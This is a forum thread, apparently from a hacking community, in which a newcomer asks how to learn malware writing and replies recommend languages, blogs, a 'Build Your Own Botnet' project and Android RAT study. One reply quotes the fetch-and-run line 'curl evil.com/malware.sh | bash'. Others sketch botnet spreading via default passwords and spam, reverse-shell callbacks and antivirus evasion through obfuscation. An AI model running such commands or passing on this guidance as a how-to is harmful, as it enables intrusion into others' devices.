Malware writing

Hey guys,

I am new here not sure what to expect. I wish to learn " how to create malware. Especially I would like to learn it step by step I mean like a “baby steps” . I would like to focus on mobile device. Can you give me some advice please ? Just point me please into some right direction with book or ebook . What languages to learn etc

Thank you :kissing_closed_eyes:

3 Likes

Check from part 1 to part 4

4 Likes

In my way of thinking… You should learn Operations Systems before learning malware…

Tips:

  1. Learn C/C++ like the back of your own hand
  2. Learn the API (cough WinAPI)
  3. Entertain original ideas and implant them with a lot of testing to see how it will work in the real world, but of course with your testing you should be able to control the program very well.

Also, blogs help a lot with getting you started.

3 Likes

Found a great blog to get started.

https://scriptdotsh.com/index.php/category/malware-development/

Reading about malware analysis teaches you a lot as well.

3 Likes

https://scriptdotsh.com/ <- The code is bad for the most part, but yeah… 100% agree that this is a good blog unlike others that are just boring as hell.

1 Like

Start learning base knowledge and skills. I always recommend getting familiar with linux first, then start branching out. You can side by side this with programming to start picking up your first language. I am a huge believer that everyone should learn to program with a scripting language or python. Bash and powershell are incredibly powerful and easy to get going on any system you may have lying around. Python can basically do anything and is probably one of the most all-encompassing tools in a security individual’s toolbox.

Once you settle on a language and start getting familiar with how to use a shell etc., then you need to pick a starter project. I always recommend the classic Build Your Own Botnet. Botnets can be something as easy as curl evil.com/malware.sh | bash and as complex as CobaltStrike. Just start executing remote commands on a box, and then start adding features.

Doesn’t building Botnet require one to actually exploit some vuln on boxes? Haven’t made my own botnet but I do want to. So, could you fill me in? :slight_smile:

Not at all, most modern botnets have been spread by either spam emails or insecure/default passwords.
Mirai is the most obvious example of spreading by taking advantage of default passwords.
I think Grum was spread via emails, but I’m not entirely sure if I’m remembering that correctly.

A bit about each style:
Spreading through insecure passwords has a rapid start followed by diminishing returns over an extended period of time.
A spam email powered botnet will begin slowly but ramp up exponentially and for limited periods of time as dictated by the quality of the email list(and also the quality of the mail, dear sir or madam united through jesus).

If you just want to play around in a lab with virtual machines then you can use the ‘Build Your Own Botnet’ project on github, or just write your own which I highly recommend.
I think that writing a basic botnet is a great little project to get a general understanding of networks, firewalls, anti-malware solutions, etc. depending on what sort of setup you test it on.
Correct me if I’m wrong about something.

3 Likes

Alice gave the best advice I see on this thread. Start by writing a program to do something basic (read a file). Then make it do something basic that is malicious (read a secret file :open_mouth:). Then make it not get detected by AV (obfuscate a little) and you’re done.

Let’s say I were to build my own botnet. Maybe I write a payload spreading through email spearphishing. NOw, does it start a reverse shell to my box to give me access? How does this work?

More or less, yea.
When the payload is run on a system it should call back your command system(s), provided it isn’t detected or blocked by a firewall on the way out.
Once it connects to whatever you’re using as the back-end of your botnet, you should have at-least limited control over the infected system.
Here’s a repo with loads of information about setting up command infrastructure:
https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki

1 Like

well for mobile devices /android u should get an open source rat available on github see how it works from the inside most likely java using androidstudio you will be able to create your own

This is real cool. Gonna start this “Build your own Botnet” project…Thanks a lot… :slight_smile:

1 Like

This topic was automatically closed after 30 days. New replies are no longer allowed.